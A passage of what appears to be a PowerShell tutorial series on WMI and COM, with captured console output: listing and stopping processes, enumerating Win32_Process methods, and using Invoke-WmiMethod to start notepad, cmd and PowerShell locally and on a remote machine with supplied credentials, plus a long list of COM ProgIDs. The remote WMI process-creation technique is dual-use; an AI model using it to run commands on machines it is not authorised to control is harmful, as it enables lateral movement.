notepad.exe\nCommandLine : \"C:\\Windows\\system32\\NOTEPAD.EXE\" C:\\Users\\Administrator\\Desktop\\log.txt\nCreationClassName : Win32_Process\nCreationDate : 20170712153213.828260-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : WIN-2012-DC\nDescription : notepad.exe\nExecutablePath : C:\\Windows\\system32\\NOTEPAD.EXE\nExecutionState :\nHandle : 956\nHandleCount : 95\nInstallDate :\nKernelModeTime : 937500\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : notepad.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 207\nOtherTransferCount : 1744\nPageFaults : 4672\nPageFileUsage : 3024\nParentProcessId : 1188\nPeakPageFileUsage : 4012\nPeakVirtualSize : 151597056\nPeakWorkingSetSize : 10756\nPriority : 8\nPrivatePageCount : 3096576\nProcessId : 956\nQuotaNonPagedPoolUsage : 9\nQuotaPagedPoolUsage : 278\nQuotaPeakNonPagedPoolUsage : 10\nQuotaPeakPagedPoolUsage : 289\nReadOperationCount : 1\nReadTransferCount : 60\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 1\nUserModeTime : 625000\nVirtualSize : 148074496\nWindowsVersion : 6.3.9600\nWorkingSetSize : 10457088\nWriteOperationCount : 10\nWriteTransferCount : 672390\nPSComputerName : WIN-2012-DC\nProcessName : notepad.exe\nHandles : 95\nVM : 148074496\nWS : 10457088\nPath : C:\\Windows\\system32\\NOTEPAD.EXE\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Remove-WmiObject```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Query {Select * from Win32_Process where Name=\"notepad.exe\"} | Remove-WmiObject\n```\n\n###### [Excercise](http://windowsitpro.com/powershell/powershell-basics-filtering-objects)\n\n- List the path of Executables for each process on your machine.\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process | Select-Object -Property Name,Path\n\nName Path\n---- ----\nSystem Idle Process\nSystem\nsmss.exe\ncsrss.exe\ncsrss.exe\nwininit.exe C:\\Windows\\system32\\wininit.exe\nwinlogon.exe C:\\Windows\\system32\\winlogon.exe\nservices.exe\nlsass.exe C:\\Windows\\system32\\lsass.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\ndwm.exe C:\\Windows\\system32\\dwm.exe\nVBoxService.exe C:\\Windows\\System32\\VBoxService.exe\nsvchost.exe C:\\Windows\\System32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nspoolsv.exe C:\\Windows\\System32\\spoolsv.exe\nMicrosoft.ActiveDirectory.WebServices.exe C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\ndfsrs.exe C:\\Windows\\system32\\DFSRs.exe\ndns.exe C:\\Windows\\system32\\dns.exe\nismserv.exe C:\\Windows\\System32\\ismserv.exe\nwlms.exe C:\\Windows\\system32\\wlms\\wlms.exe\ndfssvc.exe C:\\Windows\\system32\\dfssvc.exe\nvds.exe C:\\Windows\\System32\\vds.exe\nsvchost.exe C:\\Windows\\System32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nsvchost.exe C:\\Windows\\system32\\svchost.exe\nmsdtc.exe C:\\Windows\\System32\\msdtc.exe\ntaskhostex.exe C:\\Windows\\system32\\taskhostex.exe\nexplorer.exe C:\\Windows\\Explorer.EXE\nVBoxTray.exe C:\\Windows\\System32\\VBoxTray.exe\ncmd.exe C:\\Windows\\system32\\cmd.exe\nconhost.exe C:\\Windows\\system32\\conhost.exe\npython.exe C:\\Python27\\python.exe\nfirefox.exe C:\\Program Files\\Mozilla Firefox\\firefox.exe\nfirefox.exe C:\\Program Files\\Mozilla Firefox\\firefox.exe\npowershell.exe C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nconhost.exe C:\\Windows\\system32\\conhost.exe\nWmiPrvSE.exe C:\\Windows\\system32\\wbem\\wmiprvse.exe\nnotepad.exe C:\\Windows\\system32\\NOTEPAD.EXE\n\nPS C:\\Users\\Administrator>\n```" }, { "path": "34-Using-WMI-in-Powershell-Part-3.md", "content": "#### 34. Using WMI in Powershell Part 3\n\n- Explore ```Methods``` of a ```Class```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -List | Select-Object -ExpandProperty Methods\n\nName : Create\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Constructor, Implemented, MappingStrings, Privileges...}\n\nName : Terminate\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Destructor, Implemented, MappingStrings, Privileges...}\n\nName : GetOwner\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : GetOwnerSid\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : SetPriority\nInParameters : System.Management.ManagementBaseObject\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, MappingStrings, ValueMap}\n\nName : AttachDebugger\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, ValueMap}\n\nName : GetAvailableVirtualSize\nInParameters :\nOutParameters : System.Management.ManagementBaseObject\nOrigin : Win32_Process\nQualifiers : {Implemented, ValueMap}\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Invoke-WmiMethod``` - ```Local```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"notepad.exe\"\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 1164\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"cmd.exe\"\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 1044\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator> \n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"powershell.exe\"\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 3996\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\n- ```Invoke-WmiMethod``` - ```Remote```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"powershell.exe\" -ComputerName JOHN-PC -Credential John-PC\\John\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 3536\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\n```ProcessId``` determines that the command has been executed.\n\n- Run ```PowerShell``` commands - ```Local```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"powershell.exe -c Get-Service\"\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 2412\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"powershell.exe -noexit -c Get-Service\"\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 2096\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\n- Run ```PowerShell``` commands - ```Remote```\n\n```PowerShell\nPS C:\\Users\\Administrator> Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList \"powershell.exe -noexit -c Get-Service\" -ComputerName JOHN-PC -Credential John-PC\\John\n\n__GENUS : 2\n__CLASS : __PARAMETERS\n__SUPERCLASS :\n__DYNASTY : __PARAMETERS\n__RELPATH :\n__PROPERTY_COUNT : 2\n__DERIVATION : {}\n__SERVER :\n__NAMESPACE :\n__PATH :\nProcessId : 2280\nReturnValue : 0\nPSComputerName :\n\nPS C:\\Users\\Administrator>\n```\n\nCheck that ```powershell.exe -noexit -c Get-Service``` has executed on the ```remote``` machine\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name=\"powershell.exe\"} -ComputerName JOHN-PC -Credential John-PC\\John\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3236\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3236\"\nCaption : powershell.exe\nCommandLine : \"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712123353.342056-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3236\nHandleCount : 519\nInstallDate :\nKernelModeTime : 3905616\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 4376\nOtherTransferCount : 46062\nPageFaults : 12085\nPageFileUsage : 24428\nParentProcessId : 980\nPeakPageFileUsage : 37584\nPeakVirtualSize : 195739648\nPeakWorkingSetSize : 38424\nPriority : 8\nPrivatePageCount : 25014272\nProcessId : 3236\nQuotaNonPagedPoolUsage : 12\nQuotaPagedPoolUsage : 148\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 148\nReadOperationCount : 267\nReadTransferCount : 972300\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 7811232\nVirtualSize : 184668160\nWindowsVersion : 6.1.7600\nWorkingSetSize : 30765056\nWriteOperationCount : 3\nWriteTransferCount : 6434\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 519\nVM : 184668160\nWS : 30765056\nPath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3136\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3136\"\nCaption : powershell.exe\nCommandLine : \"C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\"\nCreationClassName : Win32_Process\nCreationDate : 20170712130457.189342-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3136\nHandleCount : 384\nInstallDate :\nKernelModeTime : 1402016\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 3210\nOtherTransferCount : 39824\nPageFaults : 10441\nPageFileUsage : 21412\nParentProcessId : 980\nPeakPageFileUsage : 35928\nPeakVirtualSize : 180490240\nPeakWorkingSetSize : 37160\nPriority : 8\nPrivatePageCount : 21925888\nProcessId : 3136\nQuotaNonPagedPoolUsage : 11\nQuotaPagedPoolUsage : 135\nQuotaPeakNonPagedPoolUsage : 12\nQuotaPeakPagedPoolUsage : 135\nReadOperationCount : 267\nReadTransferCount : 978070\nSessionId : 1\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 3905616\nVirtualSize : 170201088\nWindowsVersion : 6.1.7600\nWorkingSetSize : 30535680\nWriteOperationCount : 3\nWriteTransferCount : 6434\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 384\nVM : 170201088\nWS : 30535680\nPath : C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"3536\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"3536\"\nCaption : powershell.exe\nCommandLine : powershell.exe\nCreationClassName : Win32_Process\nCreationDate : 20170712190711.835494-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 3536\nHandleCount : 226\nInstallDate :\nKernelModeTime : 801152\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2476\nOtherTransferCount : 25882\nPageFaults : 8693\nPageFileUsage : 26280\nParentProcessId : 3656\nPeakPageFileUsage : 36124\nPeakVirtualSize : 159596544\nPeakWorkingSetSize : 33440\nPriority : 8\nPrivatePageCount : 26910720\nProcessId : 3536\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 109\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 109\nReadOperationCount : 243\nReadTransferCount : 936885\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 1602304\nVirtualSize : 149045248\nWindowsVersion : 6.1.7600\nWorkingSetSize : 34164736\nWriteOperationCount : 3\nWriteTransferCount : 8132\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 226\nVM : 149045248\nWS : 34164736\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\n__GENUS : 2\n__CLASS : Win32_Process\n__SUPERCLASS : CIM_Process\n__DYNASTY : CIM_ManagedSystemElement\n__RELPATH : Win32_Process.Handle=\"2280\"\n__PROPERTY_COUNT : 45\n__DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement}\n__SERVER : JOHN-PC\n__NAMESPACE : root\\cimv2\n__PATH : \\\\JOHN-PC\\root\\cimv2:Win32_Process.Handle=\"2280\"\nCaption : powershell.exe\nCommandLine : powershell.exe -noexit -c Get-Service\nCreationClassName : Win32_Process\nCreationDate : 20170712191345.110997-420\nCSCreationClassName : Win32_ComputerSystem\nCSName : JOHN-PC\nDescription : powershell.exe\nExecutablePath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\nExecutionState :\nHandle : 2280\nHandleCount : 240\nInstallDate :\nKernelModeTime : 1101584\nMaximumWorkingSetSize : 1380\nMinimumWorkingSetSize : 200\nName : powershell.exe\nOSCreationClassName : Win32_OperatingSystem\nOSName : Microsoft Windows 7 Ultimate |C:\\Windows|\\Device\\Harddisk0\\Partition2\nOtherOperationCount : 2461\nOtherTransferCount : 29198\nPageFaults : 9211\nPageFileUsage : 25280\nParentProcessId : 2308\nPeakPageFileUsage : 36980\nPeakVirtualSize : 160145408\nPeakWorkingSetSize : 35136\nPriority : 8\nPrivatePageCount : 25886720\nProcessId : 2280\nQuotaNonPagedPoolUsage : 10\nQuotaPagedPoolUsage : 109\nQuotaPeakNonPagedPoolUsage : 11\nQuotaPeakPagedPoolUsage : 110\nReadOperationCount : 243\nReadTransferCount : 932839\nSessionId : 0\nStatus :\nTerminationDate :\nThreadCount : 5\nUserModeTime : 2303312\nVirtualSize : 149331968\nWindowsVersion : 6.1.7600\nWorkingSetSize : 34226176\nWriteOperationCount : 3\nWriteTransferCount : 8132\nPSComputerName : JOHN-PC\nProcessName : powershell.exe\nHandles : 240\nVM : 149331968\nWS : 34226176\nPath : C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\n\nPS C:\\Users\\Administrator>\n```\n\n- Stop ```process``` using ```Remove-WmiObject```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name=\"powershell.exe\"} -ComputerName JOHN-PC -Credential John-PC\\John | Remove-WmiObject\n```\n\n```PowerShell\nPS C:\\Users\\Administrator> Get-WmiObject -Class Win32_Process -Filter {Name=\"powershell.exe\"} -ComputerName JOHN-PC -Credential John-PC\\John\n```\n" }, { "path": "35-COM-and-Powershell.md", "content": "#### 35. COM and Powershell\n\n###### Exploring COM objects\n\n```COM Objects``` are ```interfaces``` to various ```Windows Applications```\n\n- List all ```COM objects```\n\n```PowerShell\nPS C:\\> Get-ChildItem REGISTRY::HKEY_CLASSES_ROOT\\CLSID -Include PROGID -Recurse | foreach {$_.GetValue(\"\")}\nfile\nStaticMetafile\nStaticDib\nclsid\nobjref\nADODB.Command.6.0\nADODB.Parameter.6.0\nADODB.Connection.6.0\nADODB.Recordset.6.0\nADODB.Error.6.0\nADODB.ErrorLookup.6.0\nADODB.Record.6.0\nADODB.Stream.6.0\nADOX.Catalog.6.0\nADOX.Table.6.0\nADOX.Group.6.0\nADOX.User.6.0\nADOX.Column.6.0\nADOX.Index.6.0\nADOX.Key.6.0\nlnkfile\nInternetExplorer.Application.1\nPBrush\nIMsiServer\nWindowsInstaller.Message\nWindowsInstaller.Installer\nIMEAPI.CImeProductObjectJK.15\nSystem.Security.Cryptography.HMACSHA1\nDXImageTransform.Microsoft.CrBlinds.1\nMSIME.Japan.FEDict.15\nIAS.PostEapRestrictions.1\nCEIPLuaElevationHelper\nPropshts.apmSheetEnvironment.1\nCertificateAuthority.EncodeCRLDistInfo.1\nSystem.Runtime.Remoting.Metadata.SoapMethodAttribute\nSystem.Collections.SortedList\nPLA.TraceDataProviderCollection.1\nPLA.TraceDataProvider.1\nPLA.TraceSession.1\nPLA.DataCollectorSet.1\nPLA.DataCollectorSetCollection.1\nPLA.LegacyDataCollectorSet.1\nPLA.LegacyDataCollectorSetCollection.1\nPLA.LegacyTraceSession.1\nPLA.LegacyTraceSessionCollection.1\nPLA.TraceSessionCollection.1\nPLA.ServerDataCollectorSet.1\nPLA.ServerDataCollectorSetCollection.1\nPLA.BootTraceSession.1\nPLA.BootTraceSessionCollection.1\nPLA.SystemDataCollectorSet.1\nPLA.SystemDataCollectorSetCollection.1\nCImeDictAPILocalWordComment.15\nPropshts.apmPageEnvironment.1\nComPlusDebug.CorpubPublish.1\nDXImageTransform.Microsoft.Iris.1\nPropshts.apmPageFolderGenAdvanced.1\ncertocm.CertSrvUpgrade.1\nScriptlet.Context\nScriptlet.Constructor\nScriptlet.Factory\nscript\nScriptlet.HostEncode\nScriptlet.TypeLib\nScriptletHandler.Automation\nScriptletHandler.Event\nScriptletHandler.ASP\nScriptletHandler.Behavior\nSAPI.SpLexicon.1\nKSGenerator.KeystrokeGenerator.1\nWired.Snapin.1\nSystem.Security.Policy.AllMembershipCondition\nMsxml2.SAXXMLReader\nPenIMC.PimcSurrogate.4\nSystem.Runtime.InteropServices.COMException\nPathname\nSystem.ObsoleteAttribute\nPropshts.apmPagePerformEffects.1\ntsuserex.interfaces.1\nWScript.Network.1\nMMCListPadInfo.MMCListPadInfo.1\nPropshts.apmSheetExtension.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapInteger\nSppComApi.TokenActivation.1\nCorSymBinder_SxS\nCorSymReader_SxS\nSKBMonitor.KeyStrokeMonitor.1\nCorSymWriter_SxS\nVSMGMT.VssSnapshotMgmt.1\nFormHost.FormHost.1\nGPOAdminCustom.SiteCtrl.1\nStdFont\nStdPicture\nSSPWorkspace.1\nDXImageTransform.Microsoft.AlphaImageLoader.1\nSQLOLEDB.1\nGPOAdminCustom.WMICollectionCtrl.1\nHNetCfg.FwOpenPort\nHTML.HostEncode\nASP.HostEncode\nSystem.Reflection.TargetException\nScripting.FileSystemObject\nSystem.Collections.Generic.KeyNotFoundException\nSAPI.SpShortcut.1\npolmkr.apmGpeApplications.1\nGPOAdminCustom.GPOCollectionCtrl.1\nMicrosoft.JScript.JSAuthor\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNormalizedString\nERCLuaSupport.1\nSchedule.Service.1\nSAPI.SpTextSelectionInformation.1\nSeVA.SeVAEngine.1\nSystem.MemberAccessException\nPeerDraw.PeerDraw.1\nPropshts.apmPageRegionalDate.1\nSystem.TypeLoadException\nSystem.OperationCanceledException\nSystem.Runtime.Remoting.Proxies.ProxyAttribute\nGPOAdminCustom.GPOCtrl.1\nX509Enrollment.CX509EndorsementKey.1\nMicrosoft.DirectSoundParamEqDMO.1\npolmkr.apmGpeUserControl.1\nSoftwareDistribution.VistaWebControl.1\nSAPI.SpITNProcessor.1\nX509Enrollment.CCertificateAttestationChallenge.1\nMicrosoft.Update.UpdateColl.1\nShell.Application.1\nSystem.Collections.Hashtable\nSystem.Globalization.NumberFormatInfo\nSystem.Diagnostics.StackFrame\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNmtokens\nPropshts.apmSheetStartVista.1\npolmkr.apmGpeDataSources.1\nDXImageTransform.Microsoft.RadialWipe.1\nPropshts.apmSheetShortcut.1\nDXImageTransform.Microsoft.Fade.1\nDXImageTransform.Microsoft.BasicImage.1\nJScript\nWINMGMTS.1\nSppComApi.SPPLUAObject.1\nImeCommonAPIClassFactory2052.15\nPropshts.apmSheetPowerSchemes.1\npolmkr.apmGpeCompControl.1\nSeVA.SeVAResults.1\nIMEAPI.CImeCommonAPI.15\nUPnP.UPnPDeviceFinderEx.1\nhtmlfile\nCatsrv.CatalogServer\nSystem.Runtime.Serialization.OnDeserializedAttribute\nGPOAdminCustom.TemplateCtrl.1\nCertificateAuthority.EncodeStringArray.1\nWorkspaceBroker.WorkspaceBroker.1\nPropshts.apmPageFolderGen.1\nSystem.Globalization.KoreanCalendar\npolmkr.apmGpeDevices.1\nSystem.Diagnostics.DebuggerStepperBoundaryAttribute\nPropshts.apmPageDesktop.1\nPropshts.apmPageRegional.1\nIMEPad.SKF.TCIME.15\nPropshts.apmPageCommon.1\nPropshts.apmPageImdTaskSettings.1\nCImeDictAPIDictionaryList.15\nWindowsMail.MimeEdit.1\nSystem.Runtime.Serialization.OptionalFieldAttribute\ncertocm.CertEnrollUpgrade.1\nCertificateAuthority.EncodeAltName.1\nSystem.Runtime.Hosting.ApplicationActivator\nCompatContextMenu.CompatContextMenu.1\nUPnP.DescriptionDocument.1\nPropshts.apmPageStartClassic.1\nDXTransform.Microsoft.DXLUTBuilder.1\nCLRMetaData.CorMetaDataDispenserRuntime.2\nSystem.Security.Cryptography.DSASignatureDeformatter\nScriptedDiag.Engine.1\nSystem.Security.Cryptography.RijndaelManaged\ndtsh.DetectionAndSharing.1\nMicrosoft.WINDOWS.SQLLITE.Engine.4.0\nSystem.Security.Cryptography.HMACRIPEMD160\nRowPosition.RowPosition.1\nSystem.Runtime.InteropServices.PreserveSigAttribute\nWinHttp.WinHttpRequest.5.1\nImeCommonAPI1042.15\nTAPI.TAPI.1\nSystem.Runtime.Remoting.ObjRef\nMSDASC.MSDAINITIALIZE.1\nDataLinks\nMSDASCErrorLookup.1\nSystem.Globalization.HebrewCalendar\nImeCommonAPIClassFactory1042.15\nADOMD.Catalog.6.0\nADOMD.Cellset.6.0\nLDAP\nLDAPNamespace\nADsNamespaces\nDXImageTransform.Microsoft.ZigZag.1\nSystem.Runtime.Remoting.RemotingException\nSystem.Runtime.Remoting.Messaging.RemotingSurrogateSelector\nWinNTNamespace\nhtmlfile\nhtmlfile_FullWindowEmbed\nIMAPI2.MsftRawCDImageCreator.1\nGPOAdminCustom.OUCtrl.1\nImeCommonAPIClassFactory1028.15\nMSIME.Japan.SDDS.15\nMS Remote.1\nIMAPI2.MsftStreamInterleave.1\nIMAPI2.MsftStreamConcatenate.1\nIMAPI2.MsftStreamPrng001.1\nIMAPI2.MsftStreamZero.1\nIMAPI2.MsftDiscFormat2RawCD.1\nIMAPI2.MsftDiscFormat2TrackAtOnce.1\nIMAPI2.MsftDiscFormat2Data.1\nIMAPI2.MsftDiscFormat2Erase.1\nIMAPI2.MsftWriteEngine2.1\nIMAPI2.MsftDiscRecorder2.1\nIMAPI2.MsftDiscMaster2.1\nNameTranslate\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapIdrefs\nMicrosoft.Windows.Diagnosis.ManagedHost\nCOMSNAP.CPartitionPropPages.1\nSystem.Threading.ThreadInterruptedException\nSystem.IO.StringWriter\nSystem.Reflection.AmbiguousMatchException\nListPad.ListPad.1\nPropshts.apmSheetServerManagement.1\nReplProv1.RpcReplProv.1\nMicrosoft.XMLDOM.1.0\nMicrosoft.FreeThreadedXMLDOM.1.0\nMsxml2.XSLTemplate\nSystem.Diagnostics.DebuggerNonUserCodeAttribute\nPropshts.apmSheetOfflineFiles.1\nSystem.Security.Permissions.GacIdentityPermission\nSystem.CannotUnloadAppDomainException\nSymReader.dia\nNCProv.NCProvider.1\nMTxSpm.SharedPropertyGroupManager.1\nbidispl.bidispl.1\nEapMschapv2Cfg.EapMschapv2Cfg.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapNonPositiveInteger\nDXImageTransform.Microsoft.Convolution.1\nSystem.Security.Cryptography.HMACSHA256\nCOMEXPS.CTrkEvntListener\nHNetCfg.FwRule\nGPOAdminCustom.DomainCollectionCtrl.1\nIMAPI2FS.MsftFileSystemImage.1\nIMAPI2FS.BootOptions.1\nMMC.WaitDialog.1\nPropshts.apmPageFolderGenAdvancedVista.1\nSystem.Runtime.InteropServices.SafeArrayTypeMismatchException\nWireless.Snapin.1\nSystem.Runtime.Remoting.Metadata.W3cXsd2001.SoapDate\nMSExtLocality\nTheme.Manager.1\nDXImageTransform.Microsoft.RandomBars.1\npolmkr.apmGpeDrives.1\nGPOAdminCustom.PlanningCtrl.1\nMsRDP.MsRDP.9\nCertificateAuthority.EncodeDateArray.1\nHNetCfg.FwMgr\nIImgCtx\nmhtmlfile\nPeerFactory.PeerFactory.1\nhtafile\nHtmlDlgHelper.HtmlDlgHelper.1\nTrident.HTMLEditor.1\nDownloadBehavior.DownloadBehavior.1\nLayoutRect.LayoutRect.1\nTemplatePrinter.TemplatePrinter.1\nDeviceRect.DeviceRect.1\nHtmlDlgSafeHelper.HtmlDlgSafeHelper.1\nIMEFILES.CImeDictionaryFileCopier.15\nsvgfile\nxhtmlfile\nSystem.Runtime.Serialization.OnDeserializingAttribute\nImgUtil.CoMapMIMEToCLSID.1\nMsxml2.SAXXMLReader.3.0\nMicrosoft.Update.InstallationAgent.1\nSystem.Globalization.StringInfo\nSystem.EnterpriseServices.Internal.ServerWebConfig\nLayoutFolder\ncttunesvr.CtTuner.1\nRdpvcomapi.RDPViewer.1\nScripting.Encoder\nPrintConfig.PrinterExtensionManager\nTDCCtl.TDCCtl.1\nDNWithString\nUPnP.UPnPDescriptionDocumentEx.1\nbrowser_dll.ctlMsiComponentBrowser.2\nMSDataShape.1\nSystem.EnterpriseServices.Internal.SoapClientImport\nSystem.ParamArrayAttribute\nJScript9 